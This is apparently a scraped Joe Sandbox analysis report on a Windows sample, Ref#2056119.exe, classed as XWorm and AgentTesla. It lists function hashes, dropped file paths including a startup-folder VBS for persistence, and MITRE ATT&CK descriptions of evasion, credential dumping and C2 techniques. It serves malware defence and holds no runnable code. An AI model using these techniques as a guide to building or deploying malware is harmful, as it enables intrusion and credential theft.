Instruction Fuzzy Hash: 0C51CEB1F012259FCF64EBB8E8986BDBBB6EF85311F1048A9E416D7254DB318855CB80

Function 06B3FAA9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b77477a97c48da38524420730d18fc6ee447e08920f8243a19857f595ca18a
Instruction ID: 617122cca105017c83d2438de99e4eae5c50ddc915e9603b5a0d62d605ed74f0
Opcode Fuzzy Hash: 64b77477a97c48da38524420730d18fc6ee447e08920f8243a19857f595ca18a
Instruction Fuzzy Hash: 64512BB0F102248FEF60666CC96477F365FE789310F10086AE40AD77E8CA3ACC8543A2

Function 06B3FAB8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49cabce0ab82319e4d524673c367d1a4bea4a177dd27b241c8dd6651f1788e84
Instruction ID: 13ade9851c1009e566189ed5fef5c4dd81b66191aa3cf58a00ce0ae18b023e45
Opcode Fuzzy Hash: 49cabce0ab82319e4d524673c367d1a4bea4a177dd27b241c8dd6651f1788e84
Instruction Fuzzy Hash: 4E512BB0F102249FEF60666CD96473F365FD789310F200866E50AD77E8DA3ACC9543A2

Function 06B354B8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bee61f5c08ca8431365585c34468d659744593c18123e123d2852a0d7fae8be
Instruction ID: db41f89dc1271cae61c4e5cb9edc6dae0c8da31411c7ac83888f9efb66c45437
Opcode Fuzzy Hash: 8bee61f5c08ca8431365585c34468d659744593c18123e123d2852a0d7fae8be
Instruction Fuzzy Hash: 36416FB2F006198FCF70CEA9D881BAFFBB2EB84310F10496AD216D7644D730E9558B91

Function 06B33B41 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1cd398bd84da67aaad27e7c6b730dda63053db1aec772eb55d620b95c7d17a6
Instruction ID: 22075c2024d510c8c9ddb21b3f2a3872b956714cb48dccbfed057959cca414f7
Opcode Fuzzy Hash: d1cd398bd84da67aaad27e7c6b730dda63053db1aec772eb55d620b95c7d17a6
Instruction Fuzzy Hash: 4121B1B5F016299FDF10CF79D840AAEBBF5EB48710F004165E505EB395E730D8418B94

Function 06B33B50 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c449d5a1f20b904d79313bf3331835d708ca5db288cf663474b97e8ff78c16ab
Instruction ID: 5cc6a03926eee6b322a1d02aea9c7979b8e1452a97a8f69bb5961b7401bedd52
Opcode Fuzzy Hash: c449d5a1f20b904d79313bf3331835d708ca5db288cf663474b97e8ff78c16ab
Instruction Fuzzy Hash: CD218EB5F016299FDF40DF69D980AAEBBF1FB48710F108169E906EB355EB30D8408B94

Function 06B33E9B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50f2b627a457dcdd96446bdd1d8bafc067da4d86121087bb976bf8de912b82ae
Instruction ID: ed3f2432a01bf5ea44ce590c3ae4464951d1ccbf18a71c3e0e59125b889a856d
Opcode Fuzzy Hash: 50f2b627a457dcdd96446bdd1d8bafc067da4d86121087bb976bf8de912b82ae
Instruction Fuzzy Hash: 99012870B142751FDB51967C985072BB7DBDBC5610F1184BAF10ACB391E962CC0243A1

Function 06B33C60 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 173664c34896d9cc9d4ad6952776ce505a502660b7332bb6fd8a81c40aa63584
Instruction ID: 9930a369359fe6b5d047a6105cc67f2359a027438fa63ce6df5a50bee9dd3cb3
Opcode Fuzzy Hash: 173664c34896d9cc9d4ad6952776ce505a502660b7332bb6fd8a81c40aa63584
Instruction Fuzzy Hash: 5011C031B042394FCF949A68D8146AF73EBEBC8750F008579D806EB358EE64DC018BD0

Function 06B3EE08 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee947196b50c9876f443f3f223524f5d6848e354263d90129a6f8012b13ea11
Instruction ID: 90233fac7e6775ec71757012261615fec1763c9ef8e1a354b548f8694a11e1ea
Opcode Fuzzy Hash: eee947196b50c9876f443f3f223524f5d6848e354263d90129a6f8012b13ea11
Instruction Fuzzy Hash: 43018431B142611BCBA59A7C986076F77DADBC9A10F10886BE50AC7344EA21DC034795

Function 06B33C4F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b54fe25102390eeb58c195ad13011aae15091afcf447d37ea6b89d6faa42e99
Instruction ID: 37a4bb960944bf56ebe89b46bc5556cc769e3863b50524ed8b05e9be78dfc364
Opcode Fuzzy Hash: 0b54fe25102390eeb58c195ad13011aae15091afcf447d37ea6b89d6faa42e99
Instruction Fuzzy Hash: B201DF31B141391BDF94A969DC146EF76EFEBC9600F44417AD506D7285EE60CC0247E1

Function 06B33918 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43252ea76d5c965265b868e0b7a213260704354552ab3f8eb2f25e5af299df3
Instruction ID: e478024f6bcaf7f093e0fa26a30a1a23f6caf15e37d69a53c8e623aa1f4d4c2b
Opcode Fuzzy Hash: f43252ea76d5c965265b868e0b7a213260704354552ab3f8eb2f25e5af299df3
Instruction Fuzzy Hash: 4A21C4B5D01259EFCB10DF9AD884ADEFFB4FB48314F10856AE518A7200C774A554CFA5

Function 06B3A377 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b0665b149f4b002ea4fe36a8cb5a60b25859a444eafee9ddcd9fca9c3f83fb
Instruction ID: b65221165674f47670716f4538657ed083c2583bc531fe204fb7e2ddaf1449ba
Opcode Fuzzy Hash: 22b0665b149f4b002ea4fe36a8cb5a60b25859a444eafee9ddcd9fca9c3f83fb
Instruction Fuzzy Hash: 1701D430B052224FCB61EB3CD99076E77D2DB86710F108469E10AC7395DA21DD468381

Function 06B33920 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee61bd6a35100725aa99d51a14ddc0dcf940af0a905f5a1369f209c1207e56b
Instruction ID: 1c801ded7c5f4c680a2c945c74b069c51bd4089c2618edeb1ffffce79a8f2781
Opcode Fuzzy Hash: 4ee61bd6a35100725aa99d51a14ddc0dcf940af0a905f5a1369f209c1207e56b
Instruction Fuzzy Hash: BC11C2B1D01259EFCB00DF9AD884ADEFBB4FB48314F10816AE518A7200C374A544CFA5

Function 06B33EA8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6393614a0d8205c9f4dac9c0c2a7edabe60f507ba1f6445a6b65188f788ef873
Instruction ID: 436a4a5c6fcd4ef08756299a6baea4941a32b8eadf0de28507685be32ed0cc49
Opcode Fuzzy Hash: 6393614a0d8205c9f4dac9c0c2a7edabe60f507ba1f6445a6b65188f788ef873
Instruction Fuzzy Hash: D8018171B102255BDB649A7D945072BB2DBDBC9720F10887AF20AC7784EE66DC024391

Function 06B3EE18 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc6d5fb834eef50a707a8c27a3331ad43f584781b16ef21eb1e1c28b215a2a2
Instruction ID: 7cafba9d9b6c76e87b1bd568dba7000f9335800800a1ea1b6b9cc179d8754653
Opcode Fuzzy Hash: 8fc6d5fb834eef50a707a8c27a3331ad43f584781b16ef21eb1e1c28b215a2a2
Instruction Fuzzy Hash: 2B013175B242211BDBA5A97C945072E73D7D7C9A20F10887BE50AC7344EE65EC034795

Function 06B3A388 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8ff7bad307badc21170021a4950e4f9f2dfb135277fcecb145cd6b8d63647a3
Instruction ID: 259b9b2f9ef3f598d1220b70c54301bf6e795cd9569b7c7ce948964ba562069c
Opcode Fuzzy Hash: a8ff7bad307badc21170021a4950e4f9f2dfb135277fcecb145cd6b8d63647a3
Instruction Fuzzy Hash: 99014F70B112254FDB61EB7DD95472EB3D6DB89720F208879E50BC7394EE21EC428781

Function 06B3C850 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975e690ddf3af06a6629ec6cfbbce668fb8370eb095fe422c52df4808c371b60
Instruction ID: 69380a08818497f41a0f314b73767c2f89c83288d7f4ce761648ccef82f29d86
Opcode Fuzzy Hash: 975e690ddf3af06a6629ec6cfbbce668fb8370eb095fe422c52df4808c371b60
Instruction Fuzzy Hash: FF01C872F212389BCF54EAA9E8406ADB779F784314F108579E901EB384DB31AD1487C0

Function 06B364E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01d7f1f3220226af2c698a97c725cdbd54fe9e547505f9be87269f4f22bce969
Instruction ID: deac24e20ea950b271cdd985f8ac0494c0237ef4daeb65b78598d124272c7818
Opcode Fuzzy Hash: 01d7f1f3220226af2c698a97c725cdbd54fe9e547505f9be87269f4f22bce969
Instruction Fuzzy Hash: C3F06DB0B092987FDF51CA748E1579A7BBDD703208F1254F6E544CB143E276CA4187A1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ref#2056119.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Liphmahu.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

C:\Users\user\AppData\Roaming\ishon.exe

C:\Users\user\AppData\Roaming\ishon.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
Ref#2056119.exe

Function 07173798 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Function 07174E48 Relevance: 3.9, Strings: 2, Instructions: 1369
COMMON

Function 074BB0F0 Relevance: 3.1, Strings: 2, Instructions: 611
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre